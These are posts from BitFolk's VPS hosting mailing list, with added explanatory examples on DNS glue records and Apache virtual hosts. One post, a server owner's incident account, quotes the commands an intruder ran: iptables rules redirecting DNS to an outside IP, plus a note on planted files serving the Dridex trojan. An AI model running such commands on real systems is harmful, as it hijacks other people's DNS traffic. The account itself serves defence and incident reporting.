Hello,
So as to avoid missing out on our chosen venue I'm thinking about
booking a table for the Christmas drinks in the next couple of days.
I don't think I want to go through the whole doodlepoll business to
find the most-wanted day as it takes ages and hasn't been that much
of a reliable indicator of who will turn up anyway!
I am just going to say: it's going to be the first week of December,
either Tuesday 1st, Wednesday 2nd or Thursday 3rd.
So on to venue. De Hems always seems to be a popular choice, but is
there anywhere else that anyone likes better?
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Could someone please help me with setting up nameservers on a new
Bitfolk VPS (Debian Jessie with ISPConfig 3).
My old server has hostname vs1.vconsult.co.uk and the new one is
vs2.vconsult.co.uk
I currently use an external provider for Primary and Secondary DNS but
would now like to run my own nameservers.
vconsult.co.uk is hosted on UK2 who do not appear to support glue
records, needed for nameservers.
I have other domains that I could use on Fasthosts, who do appear to
support glue records.
So based on my limited knowledge of setting up nameservers, the options
I have are:
1. Transferring vconsult.co.uk to another registrar such as Fasthosts
and setting up ns1.vconsult.co.uk and ns2.vconsult.co.uk with glue records.
2. Changing the hostname on my new VPS to use a Fasthosts hosted domain
e.g. vs2.example.com and setting up ns1.example.com and ns2.example.com
with glue records.
3. Using a Fasthosts hosted domain to set up ns1.example.com and
ns2.example.com on the current hostname vs2.vconsult.co.uk
For Option 1 I'm not keen in case the transfer results in a break in
web/email services?
For Option 2 I'm not sure if there are any issues with changing the
hostname of the VPS, and would prefer to use my 'company' domain?
For Option 3 I'm not sure whether nameservers based on 'example.com' can
reside on vs2.vconsult.co.uk?
Any advice appreciated, sorry if this is a bit basic for most on the list.
Martin
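The rule behind the three options, as an added example that is not part of Martin's post: a nameserver needs a glue (A) record at the registrar of a zone only when its own name lies inside that zone, because a resolver would otherwise have to ask the zone's servers to find the zone's servers. The hostname of the machine plays no part; ns1.example.com can resolve to the same address as vs2.vconsult.co.uk. The check below is label-aware (ns1.notvconsult.co.uk is not inside vconsult.co.uk) and prints the parent-side records each case needs. The address 192.0.2.10 is a placeholder from the RFC 5737 documentation range, not the VPS's real address.

```python
"""In-bailiwick check for a DNS delegation: which NS names need glue.

Added example, not code from the post. 192.0.2.10 is a placeholder.
"""


def labels(name):
    """Split a DNS name into lowercase labels, ignoring a trailing dot."""
    return [l for l in name.lower().rstrip(".").split(".") if l]


def in_bailiwick(zone, ns_name):
    """True if ns_name is the zone apex or a name beneath it (label-aware)."""
    z, n = labels(zone), labels(ns_name)
    return len(n) >= len(z) and n[len(n) - len(z):] == z


def glue_needed(zone, ns_names):
    """Nameservers whose A records the registrar of `zone` must carry as glue."""
    return [ns for ns in ns_names if in_bailiwick(zone, ns)]


def parent_side_records(zone, nameservers):
    """Records to hand to the registrar of `zone`: an NS record for every
    server, plus an A (glue) record only for the in-bailiwick ones.
    `nameservers` maps NS name -> IPv4 address."""
    recs = []
    for ns, ip in nameservers.items():
        recs.append(f"{zone}.\tIN\tNS\t{ns}.")
        if in_bailiwick(zone, ns):
            recs.append(f"{ns}.\tIN\tA\t{ip}")  # glue
    return recs


VPS_IP = "192.0.2.10"  # placeholder for the VPS address

# The three cases from the post; the NS name decides where glue is needed.
CASES = [
    ("option 1: NS inside the company domain", "vconsult.co.uk",
     {"ns1.vconsult.co.uk": VPS_IP, "ns2.vconsult.co.uk": VPS_IP}),
    ("option 2/3: company domain delegated to example.com names", "vconsult.co.uk",
     {"ns1.example.com": VPS_IP, "ns2.example.com": VPS_IP}),
    ("option 2/3: example.com itself, if served by the same names", "example.com",
     {"ns1.example.com": VPS_IP, "ns2.example.com": VPS_IP}),
]

if __name__ == "__main__":
    for label, zone, servers in CASES:
        print(f"{label}\n  zone {zone}: glue needed for {glue_needed(zone, servers)}")
        for rec in parent_side_records(zone, servers):
            print("   ", rec)
```

For options 2 and 3 the registrar of vconsult.co.uk (UK2) only needs to accept NS records pointing at ns1/ns2.example.com, which needs no glue support there; Fasthosts needs glue for those names only if example.com is itself delegated to them. One caveat the example makes visible: with both names resolving to the same VPS, the second nameserver adds no redundancy, so a real secondary should live on a different host and network.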
The combination of Wheezy's version 5.4 PHP reaching the end of life
and the hack means I have been looking at having a new Jessie server.
The release notes for Jessie acknowledge that "We do not allow access
to the file system outside /var/www and /usr/share. If you are running
virtual hosts or scripts outside these directories, you need to
whitelist them in your configuration to grant access through HTTP."
Now, I have had virtual hosts in user's directories,
/home/*/public_html so that's me. And...
"You must allow access to your served directory explicitly in the
corresponding virtual host, or by allowing access in apache2.conf as
proposed."
I think I have, in both, but everything is still getting served by the
default server. (As opposed to getting permission denied.)
In /etc/apache2.conf:
<Directory /home/username/public_html/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
In /etc/apache2/sites-enabled (symlinked from sites-available)
<VirtualHost *>
DocumentRoot "/home/username/public_html/test"
ServerName example.co.uk
ServerAlias *.example.co.uk
ErrorLog /home/username/logs/test.example.co.uk.error.log
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" %T" commontime
CustomLog /home/username/logs/test.example.co.uk.access.log commontime
<Directory "/home/username/public_html/test">
Options FollowSymlinks
Require all granted
</Directory>
</VirtualHost>
What stupid thing am I (not) doing?
Ian
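The symptom Ian describes, every name landing on the default site rather than a 403, points at the <VirtualHost> argument rather than at the new 2.4 access control: Debian's shipped 000-default.conf declares `<VirtualHost *:80>`, and Apache first picks the most specific matching address:port set for a request, so on port 80 the `*:80` group wins and a site declared with a bare `*` is never compared by ServerName. The following is an added example, not Ian's own configuration, assuming the Debian default site is still enabled with `*:80` as shipped; the paths and names are the ones from his post.

```apache
# /etc/apache2/sites-available/test.example.co.uk.conf  (added example)
# Use the same address:port form as 000-default.conf. A bare "*" is a
# separate, less specific address set and loses to "*:80" on port 80.
<VirtualHost *:80>
    ServerName example.co.uk
    ServerAlias *.example.co.uk
    DocumentRoot /home/username/public_html/test

    ErrorLog /home/username/logs/test.example.co.uk.error.log
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\" %T" commontime
    CustomLog /home/username/logs/test.example.co.uk.access.log commontime

    # Apache 2.4 access control: Require replaces Order/Allow/Deny, and the
    # global "Require all denied" outside /var/www must be overridden here.
    <Directory /home/username/public_html/test>
        Options FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
</VirtualHost>
```

After `a2ensite test.example.co.uk` and `apache2ctl configtest`, `apache2ctl -S` prints the virtual host table grouped by address:port; the site that should answer example.co.uk has to appear in the same `*:80` group as the default server (which is listed first and is what answers unmatched names).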
Hi,
There's a serious security bug in the Xen hypervisor currently under
embargo until 29th October.
The following of BitFolk's hosts are affected:
bellini.bitfolk.com
dunkel.bitfolk.com
president.bitfolk.com
snaps.bitfolk.com
sol.bitfolk.com
Some time before the 29th these hosts are going to require their
hypervisors to be upgraded and that upgrade will require the host to
be rebooted, so all VPSes on those hosts will also be shut down and
booted again.
I've not yet fixed exactly when this will be done. Most likely in
the early hours of the morning UK time across three nights close to
the end of the embargo.
To complicate matters further, as you're probably aware we're at the
moment in the middle of migrating customers to new hardware and
upgrading them in the process:
https://tools.bitfolk.com/wiki/Hardware_refresh,_2015-2016
http://lists.bitfolk.com/lurker/message/20150927.060438.69cadb3d.en.html
One new host, snaps, has already been deployed and is now at full
capacity, so I'm in the process of deploying the next one now. That
means that the next one can be patched before customers are put on
it, and so the next batch of upgrades will side-step the need for
this other reboot.
So, if:
- You've already been contacted about migrating+upgrading your VPS
but you have so far chosen not to respond, and
- Your VPS is on one of the above listed hosts
then you may wish to consider going back to that email and agreeing
to the migration+upgrade as soon as possible, as otherwise you are
most likely going to experience some down time for the security
patch and ALSO some down time for your eventual forced
migration+upgrade.
I'll follow up as soon as I can with dates/times the patching and
reboots will take place.
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
announce mailing list
announce(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/announce
Earlier this month, a Greek IP address failed to log in to five WordPress
sites on two of my servers - not on BitFolk. One attempt each on four
sites, and seven on another spread over several days.
On Tuesday last week, it was blocked for 24 hours by both of them after
five failed attempts to log in via ssh.
On Wednesday, it succeeded on one of them. Given the strength of the
password, the fact that it's not used (by me) anywhere else, and the
chance of doing this by random, I would quite like to know *how*.
I did login over ssh that day via my mobile, but there is no sign that
my phone is compromised - I logged into three other servers that day,
and none of them have seen this happen. Similarly, if my PC had an
issue, I would expect the other servers to be affected.
I would be wondering about the other people who know the password for
this one except that if it knew the password, why did the IP address
fail the previous day?
Two other 'not me' IP addresses have also since managed it, most
recently on Sunday.
What I can see that they did was firstly...
netstat -napu
cat /etc/resolv.conf
cat /etc/bind/named.conf.default-zones
ifconfig
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 176.9.74.8:10054
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -t nat -L -v -n
iptables -t nat -L -v -n
ifconfig
iptables -L -v -n -x
iptables -I OUTPUT -p udp --sport 53 -j ACCEPT
iptables -I OUTPUT -p udp --dport 53 -j ACCEPT
iptables -L -v -n -x
exit
netstat -napu
exit
.. which, if I understand it correctly, is redirecting DNS requests to
that IP address (various sites reckon that's a site in Germany,
chipmanuals.com, apparently owned by someone in Tbilisi, Georgia...)
Secondly, on Sunday various files were placed in /tmp/.estbuild
including a copy of nginx.
This seems to have been serving a version of the Dridex trojan in the
form of a Windows .exe file from (domain name)/uniq/* before passing the
request onto Apache to 404 the /uniq/ URLs. Fortunately, because of how
it was set up, only requests to the server's own domain name were
affected and it looks like that only had about three human visitors in
that time, one of whom complained.
Obviously more could have happened - there's nothing else odd in various
log files, but clearly they cannot be completely trusted.
On the plus side, this was the server that was first in my queue to
replace with one running Debian Jessie, and it has been ten years since
anything like this has happened to me,* but grrr...
Ian
* The person who ended up being the boss of a former workplace opened an
executable attachment in an email both 'to' and 'from' them that they
knew they hadn't sent, but they "wanted to know what it was..."
I am on kwak. Just rebooted. After rebooting, system time was
about two hours in the future, until:
Oct 14 15:34:44 <myhost> ntpdate[461]: step time server 131.211.8.244 offset -7049.893933 sec
Is the initial time picked up off the host?
Hi,
I haven't done a security incident posting in a while, but that is
down to me forgetting to do them rather than any lack of them!
On 2nd October a customer's compromised Wordpress install was used
to attempt brute-force logins on another remote site's Wordpress.
This drew an abuse report which is how the original compromise was
discovered.
It's not known at this stage how the customer's Wordpress was
compromised. The site has been disabled.
Cheers,
Andy
About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings
--
http://bitfolk.com/ -- No-nonsense VPS hosting